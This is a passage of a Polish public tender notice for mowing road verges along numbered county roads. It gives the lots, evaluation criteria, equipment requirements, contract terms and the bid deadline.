celu zapewnienia widoczności dla kierujących pojazdami, wraz z powierzchniami skrzyżowań w trójkącie widoczności i wysepkami w obrębie skrzyżowań,<br/>b)	obowiązkowe ręczne dokoszenie poboczy dróg wokół rosnących drzew, urządzeń infrastruktury tj.: znaków drogowych, balustrad, słupów, przystanków autobusowych, wzdłuż chodników na szerokość min. 1,5 m od zewnętrznej krawędzi chodnika, oraz w terenie zabudowanym miejscowości na całej szerokości pasa drogowego od krawędzi jezdni do ogrodzeń posesji przyległych do pasa drogowego.<br/>c)	Maksymalna wysokość traw po koszeniu - 5 cm od powierzchni gruntu.<br/>d)	Zamawiający wymaga by Wykonawca dysponował pełnosprawnym sprzętem i urządzeniami do wykonania zamówienia tj.: minimum jedną kosiarką rotacyjną lub bijakową wraz z nośnikiem, oraz minimum dwiema wykaszarkami ręcznymi na każde zadanie oddzielnie w przypadku realizacji więcej niż jednego zadania objętego przedmiotem zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77312000-0 - Usługi usuwania chwastów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Nr	Nazwa kryterium	Waga<br/>1.	Cena ryczałtowa brutto	60 %<br/>2.	Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II	40%<br/><br/>	Punkty przyznawane za podane wyżej kryteria będą liczone według następujących wzorów:<br/>Nr kryterium	Wzór<br/>1.	<br/>C=Cn/Cx x 60 waga<br/><br/>gdzie:<br/>C - ilość punktów za kryterium cena oferty brutto<br/>Cn - najniższa cena spośród wszystkich ofert<br/>Cx - cena oferty badanej<br/>2.	Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II – 40 waga<br/><br/>	Punkty w kryterium termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II zostaną przyznane według następujących zasad:<br/><br/>Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II	Liczba punktów<br/>skrócenie o 6 dni, tj. wykonanie zadania do 14 dni	40 pkt<br/>skrócenie o 4 dni, tj. wykonanie zadania do 16 dni	25 pkt<br/>skrócenie o 2 dni, tj. wykonanie zadania do 18 dni	10 pkt<br/>brak skrócenia, tj. wykonanie zadania do 20 dni	0 pkt<br/><br/>	W przypadku niewłaściwie lub błędnie wypełnionego przez Wykonawcę w formularzu ofertowym kryterium „Termin skrócenia zakończenia zamówienia dla Etapu I i dla Etapu II” Zamawiający przyzna 0 punktów w tym kryterium, a jako deklarowany termin skrócenia zakończenia zamówienia dla Etapu I i dla Etapu II zostanie przyjęty brak skrócenia, tj. wykonanie zadania do 20 dni.<br/>	Wykonawca deklaruje identyczny termin skrócenia wykonania zamówienia zarówno dla Etapu I jak i dla Etapu II, tj. jeżeli zadeklaruje termin skrócenia wykonania zamówienia o 6 dni, to znaczy, że termin ten obowiązuje dla Etapu I oraz dla Etapu II.<br/>	Wykonawca nie może zaoferować terminu zakończenia zamówienia dla Etapu I i dla Etapu II dłuższego niż do 20 dni. Termin zakończenia zamówienia dla Etapu I i dla Etapu II do 20 dni jest terminem maksymalnym.<br/>	Zamawiający nie będzie przyznawał punktów pośrednich w kryterium „Termin skrócenia zakończenia zamówienia dla Etapu I i dla Etapu II” tzn. możliwe są do przyznania punkty odpowiednio: 0, 10, 25, 40. Maksymalna liczba punktów jaką może uzyskać Wykonawca w kryterium Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II wynosi 40 punktów.<br/>	Łączna ilość punktów dla badanej oferty będzie liczona wg następującego wzoru: <br/>S = C + T <br/>gdzie:	S – łączna suma punktów badanej oferty <br/>C – cena ryczałtowa brutto <br/>T – termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II <br/>	Ocena punktowa będzie dotyczyć wyłącznie ofert uznanych za ważne i nie podlegających odrzuceniu. Danych z ofert uznanych za nieważne nie bierze się pod uwagę przy obliczaniu punktacji.<br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów przy uwzględnieniu powyższych kryteriów.<br/>	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4)	Zadanie nr 4 - Usługa koszenia z poboczy dróg powiatowych nr 2900G, 2901G, 3103G, 3105G, 3107G, 3108G, 3109G, 3141G, 3144G.<br/>Lp.	Nr drogi	Nazwa drogi	Strony drogi	Długość drogi w metrach	Szerokość<br/>minimalna koszenia w m	Powierzchnia w m2<br/>1	2900G	Koniewałd - Malbork	2	6305	1	12610<br/>2	2901G	Piekło - Miłoradz	2	2551	1	5102<br/>3	3103G	Dojazd do stacji PKP Sztumska Wieś	2	589	1	1178<br/>4	3105G	Sztum - Dąbrówka Malborska	2	12429	1,5	37287<br/>5	3106G	DK nr 55 – stacja<br/>kolejowa Gościszewo	2	668	1	1336<br/>6	3107G	Gościszewo - Węgry	2	4496	1	8992<br/>7	3108G	Sztumskie Pole - Uśnice	2	6171	1	12342<br/>8	3109G	Sztum - Kalwa	2	8030	1,5	24090<br/>9	3141G	Sztum - Watkowice	2	8012	1,5	24036<br/>10	3144G	Postolin - Klecewko	2	608	1	1216<br/>RAZEM	49528 129200<br/>3.	Przedmiot zamówienia obejmuje w szczególności:<br/>1)	Dwukrotne w okresie trwania umowy:<br/>a)	mechaniczne koszenie traw i chwastów rosnących na poboczach dróg po obu stronach jezdni<br/>na szerokości minimum od 1,0 m do 1,5 m (zgodnie z wykazem dróg) – po wewnętrznych stronach łuków w zakresie zwiększonym w celu zapewnienia widoczności dla kierujących pojazdami, wraz z powierzchniami skrzyżowań w trójkącie widoczności i wysepkami w obrębie skrzyżowań,<br/>b)	obowiązkowe ręczne dokoszenie poboczy dróg wokół rosnących drzew, urządzeń infrastruktury tj.: znaków drogowych, balustrad, słupów, przystanków autobusowych, wzdłuż chodników na szerokość min. 1,5 m od zewnętrznej krawędzi chodnika, oraz w terenie zabudowanym miejscowości na całej szerokości pasa drogowego od krawędzi jezdni do ogrodzeń posesji przyległych do pasa drogowego.<br/>c)	Maksymalna wysokość traw po koszeniu - 5 cm od powierzchni gruntu.<br/>d)	Zamawiający wymaga by Wykonawca dysponował pełnosprawnym sprzętem i urządzeniami do wykonania zamówienia tj.: minimum jedną kosiarką rotacyjną lub bijakową wraz z nośnikiem, oraz minimum dwiema wykaszarkami ręcznymi na każde zadanie oddzielnie w przypadku realizacji więcej niż jednego zadania objętego przedmiotem zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77312000-0 - Usługi usuwania chwastów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Nr	Nazwa kryterium	Waga<br/>1.	Cena ryczałtowa brutto	60 %<br/>2.	Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II	40%<br/><br/>	Punkty przyznawane za podane wyżej kryteria będą liczone według następujących wzorów:<br/>Nr kryterium	Wzór<br/>1.	<br/>C=Cn/Cx x 60 waga<br/><br/>gdzie:<br/>C - ilość punktów za kryterium cena oferty brutto<br/>Cn - najniższa cena spośród wszystkich ofert<br/>Cx - cena oferty badanej<br/>2.	Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II – 40 waga<br/><br/>	Punkty w kryterium termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II zostaną przyznane według następujących zasad:<br/><br/>Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II	Liczba punktów<br/>skrócenie o 6 dni, tj. wykonanie zadania do 14 dni	40 pkt<br/>skrócenie o 4 dni, tj. wykonanie zadania do 16 dni	25 pkt<br/>skrócenie o 2 dni, tj. wykonanie zadania do 18 dni	10 pkt<br/>brak skrócenia, tj. wykonanie zadania do 20 dni	0 pkt<br/><br/>	W przypadku niewłaściwie lub błędnie wypełnionego przez Wykonawcę w formularzu ofertowym kryterium „Termin skrócenia zakończenia zamówienia dla Etapu I i dla Etapu II” Zamawiający przyzna 0 punktów w tym kryterium, a jako deklarowany termin skrócenia zakończenia zamówienia dla Etapu I i dla Etapu II zostanie przyjęty brak skrócenia, tj. wykonanie zadania do 20 dni.<br/>	Wykonawca deklaruje identyczny termin skrócenia wykonania zamówienia zarówno dla Etapu I jak i dla Etapu II, tj. jeżeli zadeklaruje termin skrócenia wykonania zamówienia o 6 dni, to znaczy, że termin ten obowiązuje dla Etapu I oraz dla Etapu II.<br/>	Wykonawca nie może zaoferować terminu zakończenia zamówienia dla Etapu I i dla Etapu II dłuższego niż do 20 dni. Termin zakończenia zamówienia dla Etapu I i dla Etapu II do 20 dni jest terminem maksymalnym.<br/>	Zamawiający nie będzie przyznawał punktów pośrednich w kryterium „Termin skrócenia zakończenia zamówienia dla Etapu I i dla Etapu II” tzn. możliwe są do przyznania punkty odpowiednio: 0, 10, 25, 40. Maksymalna liczba punktów jaką może uzyskać Wykonawca w kryterium Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II wynosi 40 punktów.<br/>	Łączna ilość punktów dla badanej oferty będzie liczona wg następującego wzoru: <br/>S = C + T <br/>gdzie:	S – łączna suma punktów badanej oferty <br/>C – cena ryczałtowa brutto <br/>T – termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II <br/>	Ocena punktowa będzie dotyczyć wyłącznie ofert uznanych za ważne i nie podlegających odrzuceniu. Danych z ofert uznanych za nieważne nie bierze się pod uwagę przy obliczaniu punktacji.<br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów przy uwzględnieniu powyższych kryteriów.<br/>	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5)	Zadanie nr 5 – Usługa koszenia z poboczy dróg powiatowych nr 3113G, 3114G, 3115G, 3116G, 3137G, 3140G, 3142G, 3143G, 3146G, 3147G.<br/>Lp.	Nr drogi	Nazwa drogi	Strony drogi	Długość drogi w metrach	Szerokość<br/>minimalna koszenia w m	Powierzchnia w m2<br/>1	3113G	Polaszki - Mikołajki Pomorskie	2	8463	1,5	25389<br/>2	3114G	Mikołajki Pomorskie - Dzierzgoń	2	15073	1,5	45219<br/>3	3115G	Postolin - Dąbrówka Pruska	2	6361	1	12722<br/>4	3116G	Balewo - Matule	2	7428	1	14856<br/>5	3137G	Mikołajki Pomorskie - Nowy Targ	2	4151	1	8302<br/>6	3140G	Pierzchowice - Kwidzyn	2	2297	1	4594<br/>7	3142G	Mikołajki Pomorskie - Ryjewo	2	6185	1	12370<br/>8	3143G	Wilczewo - Kamienna	2	2668	1	5336<br/>9	3146G	Dworek - Jakubowo	2	6052	1	12104<br/>10	3147G	Antonin - Stążki	2	633	1	1266<br/>RAZEM	59311 142158<br/>3.	Przedmiot zamówienia obejmuje w szczególności:<br/>1)	Dwukrotne w okresie trwania umowy:<br/>a)	mechaniczne koszenie traw i chwastów rosnących na poboczach dróg po obu stronach jezdni<br/>na szerokości minimum od 1,0 m do 1,5 m (zgodnie z wykazem dróg) – po wewnętrznych stronach łuków w zakresie zwiększonym w celu zapewnienia widoczności dla kierujących pojazdami, wraz z powierzchniami skrzyżowań w trójkącie widoczności i wysepkami w obrębie skrzyżowań,<br/>b)	obowiązkowe ręczne dokoszenie poboczy dróg wokół rosnących drzew, urządzeń infrastruktury tj.: znaków drogowych, balustrad, słupów, przystanków autobusowych, wzdłuż chodników na szerokość min. 1,5 m od zewnętrznej krawędzi chodnika, oraz w terenie zabudowanym miejscowości na całej szerokości pasa drogowego od krawędzi jezdni do ogrodzeń posesji przyległych do pasa drogowego.<br/>c)	Maksymalna wysokość traw po koszeniu - 5 cm od powierzchni gruntu.<br/>d)	Zamawiający wymaga by Wykonawca dysponował pełnosprawnym sprzętem i urządzeniami do wykonania zamówienia tj.: minimum jedną kosiarką rotacyjną lub bijakową wraz z nośnikiem, oraz minimum dwiema wykaszarkami ręcznymi na każde zadanie oddzielnie w przypadku realizacji więcej niż jednego zadania objętego przedmiotem zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77312000-0 - Usługi usuwania chwastów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Nr	Nazwa kryterium	Waga<br/>1.	Cena ryczałtowa brutto	60 %<br/>2.	Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II	40%<br/><br/>	Punkty przyznawane za podane wyżej kryteria będą liczone według następujących wzorów:<br/>Nr kryterium	Wzór<br/>1.	<br/>C=Cn/Cx x 60 waga<br/><br/>gdzie:<br/>C - ilość punktów za kryterium cena oferty brutto<br/>Cn - najniższa cena spośród wszystkich ofert<br/>Cx - cena oferty badanej<br/>2.	Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II – 40 waga<br/><br/>	Punkty w kryterium termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II zostaną przyznane według następujących zasad:<br/><br/>Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II	Liczba punktów<br/>skrócenie o 6 dni, tj. wykonanie zadania do 14 dni	40 pkt<br/>skrócenie o 4 dni, tj. wykonanie zadania do 16 dni	25 pkt<br/>skrócenie o 2 dni, tj. wykonanie zadania do 18 dni	10 pkt<br/>brak skrócenia, tj. wykonanie zadania do 20 dni	0 pkt<br/><br/>	W przypadku niewłaściwie lub błędnie wypełnionego przez Wykonawcę w formularzu ofertowym kryterium „Termin skrócenia zakończenia zamówienia dla Etapu I i dla Etapu II” Zamawiający przyzna 0 punktów w tym kryterium, a jako deklarowany termin skrócenia zakończenia zamówienia dla Etapu I i dla Etapu II zostanie przyjęty brak skrócenia, tj. wykonanie zadania do 20 dni.<br/>	Wykonawca deklaruje identyczny termin skrócenia wykonania zamówienia zarówno dla Etapu I jak i dla Etapu II, tj. jeżeli zadeklaruje termin skrócenia wykonania zamówienia o 6 dni, to znaczy, że termin ten obowiązuje dla Etapu I oraz dla Etapu II.<br/>	Wykonawca nie może zaoferować terminu zakończenia zamówienia dla Etapu I i dla Etapu II dłuższego niż do 20 dni. Termin zakończenia zamówienia dla Etapu I i dla Etapu II do 20 dni jest terminem maksymalnym.<br/>	Zamawiający nie będzie przyznawał punktów pośrednich w kryterium „Termin skrócenia zakończenia zamówienia dla Etapu I i dla Etapu II” tzn. możliwe są do przyznania punkty odpowiednio: 0, 10, 25, 40. Maksymalna liczba punktów jaką może uzyskać Wykonawca w kryterium Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II wynosi 40 punktów.<br/>	Łączna ilość punktów dla badanej oferty będzie liczona wg następującego wzoru: <br/>S = C + T <br/>gdzie:	S – łączna suma punktów badanej oferty <br/>C – cena ryczałtowa brutto <br/>T – termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II <br/>	Ocena punktowa będzie dotyczyć wyłącznie ofert uznanych za ważne i nie podlegających odrzuceniu. Danych z ofert uznanych za nieważne nie bierze się pod uwagę przy obliczaniu punktacji.<br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów przy uwzględnieniu powyższych kryteriów.<br/>	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu<br/>2.4.	Zdolności technicznej lub zawodowej:<br/>2.4.1	Sprzęt: <br/>Warunek zostanie uznany za spełniony wówczas, jeżeli Wykonawca wykaże, że dysponuje sprzętem i urządzeniami do wykonania zamówienia, tj.:<br/>Część nr 1	Minimum jedną kosiarką rotacyjną lub bijakową wraz z nośnikiem,<br/>Minimum dwiema wykaszarkami ręcznymi.<br/>Część nr 2	Minimum jedną kosiarką rotacyjną lub bijakową wraz z nośnikiem, <br/>Minimum dwiema wykaszarkami ręcznymi.<br/>Część nr 3	Minimum jedną kosiarką rotacyjną lub bijakową wraz z nośnikiem, <br/>Minimum dwiema wykaszarkami ręcznymi.<br/>Część nr 4	Minimum jedną kosiarką rotacyjną lub bijakową wraz z nośnikiem,<br/>Minimum dwiema wykaszarkami ręcznymi.<br/>Część nr 5	Minimum jedną kosiarką rotacyjną lub bijakową wraz z nośnikiem,<br/>Minimum dwiema wykaszarkami ręcznymi. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">3.2.	Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania spełniania warunków udziału w postępowaniu (określonych przez Zamawiającego w ust. 2 niniejszego pkt SWZ), na podstawie art. 274 ust. 1 ustawy zostanie wezwany do złożenia następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/>a)	w celu wykazania spełniania warunku z pkt. 2.4.1.:<br/>3.2.1.	Wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami zgodnie z:<br/>a)	Część I: Załącznikiem nr 4A do SWZ;<br/>b)	Część II: Załącznikiem nr 4B do SWZ;<br/>c)	Część III: Załącznikiem nr 4C do SWZ;<br/>d)	Część IV: Załącznikiem nr 4D do SWZ;<br/>e)	Część V: Załącznikiem nr 4E do SWZ.<br/>Zamawiający oceniając warunek udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej Wykonawcy, może na każdym etapie postępowania, uznać że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>4.	Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>1)	może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17.02.2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp dane umożliwiające dostęp do tych środków;<br/>2)	podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w art. 125 ust. 1.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3.1.	Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania braku podstaw (przesłanek) wykluczenia z postępowania, na podstawie art. 274 ust. 1 ustawy zostanie wezwany do złożenia następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/>a)	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2023 r. poz. 1689 ze zm.), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 3 do SWZ;<br/>b)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie w zakresie pkt 3.1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy, zgodnie ze wzorem stanowiącym załącznik nr 2B do SWZ.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych w Projektowanych Postanowieniach Umowy, stanowiących Załączniki nr 6A, 6B, 6C, 6D i 6E do SWZ.<br/>2.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty, w zakresie uregulowanym w art. 454-455 ustawy PZP oraz wskazanym we Wzorach umów, stanowiących Załączniki nr 6A, 6B, 6C, 6D i 6E do SWZ.<br/>4.	Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://www.platformazakupowa.pl/transakcja/1106506</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia 